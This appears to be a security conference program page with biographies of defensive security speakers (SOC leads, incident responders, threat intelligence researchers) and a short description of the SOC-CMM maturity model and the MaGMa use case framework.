Program Overview

Savina has a Masters of Engineering degree in telecommunications and digital signal processing and started working in 2003 in IT support. He specializes in Microsoft infrastructures as a system administrator and IT Architect and has been maintaining, securing, deploying, migrating, automating and designing Active Directory environments for about 10 years in various sectors such as Energy, Hospitals and Government. Savina is active on Twitter (@ldap389) and has writes blogs at https://ldap389.info/en. In 2017 he joined the CERT-FR as a DFIR analyst, where he applies his previously acquired knowledge, handling and investigating cybersecurity incidents.

Vijay Thaware has been working at Symantec's STAR Anti-Spam Team for the last seven years as Security Response Lead. He is involved in anti-spam, anti-fraud, and anti-malware content development and automation. His day-to-day work involves investigation and research on latest email threats in order to present effective solutions. He is also an international speaker and has presented POCs at BlackHat USA 2017 (Las Vegas) and BlackHat Europe 2018 (London).

Daniil is leading Threat Detection team at Tieto Security Operations Center (SOC) in Czech Republic, Ostrava. Before that, he was responsible for processes and systems architecture development of Informzaschita SOC in Moscow, Russia. Daniil spent more than six years in Practical Computer Security and Network Monitoring domains. He is Offensive Security Certified Professional (OSCP), Cisco Certified Network Professional Security (CCNP Security), GIAC Network Forensic Analyst (GNFA) and member of GIAC Advisory Board. He had talks at Code Europe, CONFidence and EU MITRE ATT&CK community workshops, presenting Intelligence-Driven Defence approach implementation and MITRE ATT&CK operationalization. Daniil is also Krakow 2600 Meetings coordinator and creator of Atomic Threat Coverage project.

Mateusz is a former Threat Detection specialist and currently works as Incident Responder in Tieto SOC in Poland, Krakow. Before Tieto, he was working for Cisco SOC as a Security Analyst. He holds GIAC Certified Forensic Analyst (GCFA) and CCNA Cyber Ops certifications and is a member of GIAC Advisory Board. Mateusz is also Krakow 2600 Meetings cordinator and co-creator of Atomic Threat Coverage project.

Mikhail leads BI.ZONE Security Operations Center (SOC) Automation team in Russia, Moscow. Before that he was responsible for automated security assessment and governance. Mikhail had talks at OWASP Russia 2016 and PHDays 2018, speaking about automated security assessment in large and highly distributed networks. He is also co-creator of Atomic Threat Coverage project.

JINGYU BAO is a security engineer. He currently working in passive DNS team of Netlab, focussing on cyber threat discovery, intelligence traceability and data analysis.

LITAO WU is a software engineer with a passion for back-end program development. He has a wealth of experience in WEB development and data analysis. Now he works in Netlab where he attempts to build large-scale data stream systems to capture popular attacks in cyber space.

YANG XU is a cyber security analyst since 2010 and currently a member of Network Security Research Lab at Qihoo 360 (Netlab) where he focus on net-traffic/DNS data process/analysis and threat research. Before joining NetLab, he was a security engineer in NSFOCUS and has been involved in many different projects, like SoC architecture design and implementation, and intranet-traffic anomaly detection.

Olaf Hartong is a Defensive Specialist and security researcher at FalconForce. He specializes in understanding the attacker tradecraft and thereby improving detection. He has a varied background in blue and purple team operations, network engineering, and security transformation projects.

Olaf has presented at many industry conferences including Black Hat, DEF CON, DerbyCon, Splunk .conf, FIRST, MITRE ATT&CKcon, and various other conferences. Olaf is the author of various tools including ThreatHunting for Splunk, ATTACKdatamap and Sysmon-modular. He maintains a blog at https://olafhartong.nl

Paul Vixie serves as VP and Distinguished Engineer at AWS Security, and is a Director at SIE Europe U.G. He was previously the founder and CEO of Farsight Security (2013-2021). In addition, he founded and operated the first anti-spam company (MAPS, 1996), the first non-profit Internet infrastructure software company (ISC, 1994), and the first neutral and commercial Internet exchange (PAIX, 1991). Vixie was inducted into the Internet Hall of Fame in 2014 for work related to DNS, and is a prolific author of open source Internet software including Cron and BIND, and of many Internet standards concerning DNS and DNSSEC. He was CTO at Abovenet/MFN (1999-2001) and worked at DEC Western Research Lab (1988-1993) after dropping out of school in 1980. Vixie earned his Ph.D. in Computer Science from Keio University in 2011.

Anastasios Pingios is a security professional who started from the exploit development and vulnerability research side around 15 years ago and later on switched to the defensive side. He holds a M.Sc. in Secure Computing Systems from the University of Hertfordshire, numerous certifications on the subject of intelligence collection and intelligence analysis, and has presented a wide variety of topics from unconventional phishing techniques, to secure architecture in the cloud, and building successful intelligence teams. Currently, Anastasios is Principal Security Engineer at Booking.com and for the last few years he has been focusing on threat intelligence from a holistic perspective that takes into account all domains instead of just cyber.

Willem Gerber started with security as a hobby and it has turned into a full-time career. Currently Willem Gerber works as Senior Security Engineer for Cloud Security in Booking.com.

Manfred Erjak is a principal consultant within Mandiant's Security Transformation Services (STS) team and is based in Austria. He is a trusted information security expert and distinguished IT network architect with over 20 years of experience working with utilities, manufacturing, technology, pharmaceutical and Fortune 500 companies. His primary focus is on leading and executing remediation activities, but he also provides expertise with incident response.

Prior to joining Mandiant, Manfred served various information security expert and system architect roles at Infineon Technologies and Cisco Systems. Manfred holds a bachelor’s in network engineering and master’s degrees in communication engineering from the Carinthia University of Applied Sciences.

Matthew McWhirt is a Manager within Mandiant’s Security Transformation Services (STS) team – specializing in remediation and enterprise architecture assessments and hardening. Matthew has over 12 years of experience specializing in security architecture, Active Directory security, and enterprise incident response. Prior to joining Mandiant, Matthew worked as a unit chief within DHS ICS-CERT, specializing in SCADA system security, ICS architecture reviews, and network device security.

Thorsten started working full time at Fraunhofer FKIE. Among his tasks as a research assistant are reverse engineering malware and implementing software for automating malware analysis.

Rob van Os, MSc., CISSP, ISSAP is a cyber defense specialist and the Product Owner of the Cyber Defense Center of the Volksbank. As such, he is responsible for cyber security operations. Rob has over a decade of practical experience in security monitoring, security incident response and security operations centers. He is also the chairman of the SOC/CSIRT working group of the Dutch FI-ISAC. Rob has obtained a Bachelor's degree in Computer Science in 2009 and a Master's degree in Information Security in 2016. Rob is the author of the SOC-CMM and MaGMa use case framework.

With DDoS attacks becoming ‘business as usual’, and widespread ransomware outbreaks such as WannaCry wreaking havoc across the globe, organisations face a challenging and dynamic threat landscape. This is why Security Operations Centers (SOCs) are becoming increasingly common. A SOC provides capabilities to protect against cyber threats, detect attacks and intrusion attempts and respond to such threats to limit their impact. To objectively evaluate if security operations are functioning effectively and maturing over time, measurement tools are required. The SOC-CMM and MaGMa Use Case Framework (MaGMa UCF) are such tools, and aim to enhance cyber defense. Both tools can be used freely.

The SOC-CMM is a model and self-assessment tool that is used to measure SOC capability maturity across 5 domains: business, people, process, technology and services. Each of these domains is assessed in detail using questions that can be scored on a 5-point scale. Using the SOC-CMM, the SOC team can identify strong and weak aspects, and determine next steps for improvement and growth.

The MaGMa UCF is a framework for use case management. This framework is supported by a tool that allows for registration, classification and measurement of use case effectiveness. The MaGMa UCF provides the capability to be in control over the security monitoring process and the alignment of security monitoring to business and compliance needs. With the MaGMa UCF, it is possible to prove to stakeholders that the SOC is in control and adequately managing and decreasing risk in the enterprise.

Andrei Barysevich is the VP of Fraud Solutions at Recorded Future. Previously, Andrei built a leading Fraud Intelligence company Gemini Advisory, now a Recorded Future company, supporting Top-3 Card Networks, largest financial institutions, and federal and international law enforcement agencies. Leveraging Gemini's fraud intelligence tools, Andrei's team identified thousands of payment card data breaches, discovered novel attack techniques, and dismantled numerous Magecart campaigns operated by the financially-motivated threat groups.

For the past 15 years, he has been involved in multiple high-profile international cases resulting in successful convictions of members of crime syndicates operating global reshipping, money laundering, and bank fraud schemes.

Christiaan Beek, lead scientist & sr. principal engineer is part of Mcafee’s Office of the CTO leading strategic threat intelligence research within Mcafee. He coordinates and leads passionately the research in advanced attacks, plays a key-role in cyberattack take-down operations and participates in the NoMoreRansom project. In previous roles, Beek was Director of Threat Intelligence in McAfee Labs and Director of Incident Response and Forensics at Foundstone, McAfee’s forensic services arm. At Foundstone, he led a team of forensic specialists in Europe, the Middle East, and Africa during major breaches. Beek develops threat intelligence strategy, designs threat intelligence systems, performs malware and forensic analysis, pentesting and coaches security teams around the globe. He is a passionate cybercrime specialist who has developed training courses, workshops, and presentations. He speaks regularly at conferences, including BlackHat, RSA, BlueHat and Botconf. Besides conferences, he is also frequently teaching at universities, Police Academies and public schools to recruit, mentor and train the next generation of cyber-security specialists. Beek contributed to the best-selling security book "Hacking Exposed." and has two patents pending. Twitter: @ChristiaanBeek

Jeff Bollinger joined Cisco Systems in 2002 supporting Cisco's security technologies and solutions in Cisco's global technical support organization. Jeff later moved to the Computer Security Incident Response Team (CSIRT) and rapidly developed its global security monitoring and incident response capabilities.With over fifteen years of information security experience, Jeff Bollinger has worked as security architect, incident responder, and people manager for both academic and enterprise networks. Specializing in investigations, network security monitoring, log analysis, and intrusion detection, Jeff Bollinger currently manages Cisco's SOC and investigations teams in the western hemisphere. Jeff helped build and operate one of the world's largest corporate security monitoring infrastructures. Jeff regularly speaks at international FIRST conferences, and occasionally writes for the Cisco Security Blog. He is also the co-author of "Crafting the InfoSec Playbook". Jeff's recent work includes log mining, search optimization, cloud threat research, and security investigations.

Matthew Valites - With over a decade of Information Security experience, Matthew has worked on Cisco’s CSIRT as both an Investigator and Investigations Manager, and most recently at Splunk as a Senior Security Specialist. He provides expertise building security monitoring and Incident Response programs for cloud and hosted service enterprises, focusing on targeted and high-value assets via a threat-centric methodology. He is a published author with a proven ability to run global, high-profile, service and revenue impacting, and complex multi-faceted investigations. Matthew strives to both learn from and share his knowledge with a global InfoSec community.

Gavin Reid is the chief security architect and head of threat research for Recorded Future. His focus is on next-generation threats and the role that threat intelligence can play in identifying and combating them. He serves as a subject matter expert on information security architecture, threat intelligence analysis, and associated initiatives. Reid also works with cybersecurity groups to ensure Recorded Future has the needed sources of data and relationships to be the premier provider of threat intelligence.

With over 25 years of experience in threat intelligence, he was a driving force behind the development of big data analytics and threat identification. This experience is exemplified in his role at Cisco Systems as director of threat research for security intelligence operations, where he led a team that developed new data analytics technologies to detect and remediate advanced cybersecurity threats. Reid also created and led Cisco’s Computer Security Incident Response Team (CSIRT), a global organization of information security professionals responsible for monitoring, investigating, and responding to cybersecurity incidents. In addition to his time at Cisco, Reid also served as the vice president of the cyber threat intelligence group at Fidelity Investments and oversaw IT security at NASA’s Johnson Space Center.